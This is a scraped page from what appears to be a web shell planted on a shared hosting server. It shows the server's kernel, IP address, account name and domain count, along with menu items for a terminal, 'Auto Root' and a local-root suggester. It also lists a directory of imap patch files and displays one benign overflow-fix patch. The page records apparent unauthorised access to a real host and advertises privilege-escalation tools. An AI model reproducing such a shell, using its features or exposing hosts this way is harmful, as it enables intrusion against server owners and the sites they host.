Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
lib /
imap /
supplemental /
patches /
Delete
Unzip
Name
Size
Permission
Date
Action
1006_openssl1.1_autoverify.patch
2.15
KB
-rw-r--r--
2023-01-11 06:22
README.md
325
B
-rw-r--r--
2023-01-11 06:22
imap-2004a-doc.patch
885
B
-rw-r--r--
2023-01-11 06:22
imap-2007-paths.patch
614
B
-rw-r--r--
2023-01-11 06:22
imap-2007e-authmd5.patch
1.61
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-overflow.patch
721
B
-rw-r--r--
2023-01-11 06:22
imap-2007e-poll.patch
7.5
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-shared.patch
2.56
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-system_c_client.patch
728
B
-rw-r--r--
2023-01-11 06:22
imap-2007f-format-security.patch
680
B
-rw-r--r--
2023-01-11 06:22
imap-2007f-ldflags.patch
964
B
-rw-r--r--
2023-01-11 06:22
Save
Rename
diff -up imap-2007e/src/c-client/rfc822.c.overflow imap-2007e/src/c-client/rfc822.c --- imap-2007e/src/c-client/rfc822.c.overflow 2008-12-12 11:08:26.000000000 -0600 +++ imap-2007e/src/c-client/rfc822.c 2009-07-07 19:27:20.057772757 -0500 @@ -384,6 +384,9 @@ void rfc822_parse_content (BODY *body,ST if (CHR (bs) == '\012'){/* following LF? */ c = SNX (bs); i--; /* yes, slurp it */ } + if (!i) /* Make sure we don't get an overflow for */ + break; /* messages ending on \015 (or the following */ + /* i-- will cause i to be MAXINT. Not good.) */ case '\012': /* at start of a line, start with -- ? */ if (!(i && i-- && ((c = SNX (bs)) == '-') && i-- && ((c = SNX (bs)) == '-'))) break;